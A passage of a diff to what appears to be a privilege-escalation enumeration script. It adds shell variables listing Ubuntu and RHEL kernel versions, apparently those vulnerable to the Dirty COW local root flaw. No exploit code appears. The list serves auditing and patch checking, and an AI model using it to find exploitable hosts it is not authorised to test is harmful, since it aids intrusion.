2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24"
+kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual"
+kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual"
+kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic"
+kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic"
+kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic"
+kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic"
+kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency"
+kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic"
+kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic"
+kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency"
+kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency"
+kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5"
+kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5"
+kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5"
+kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6"
+kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6"
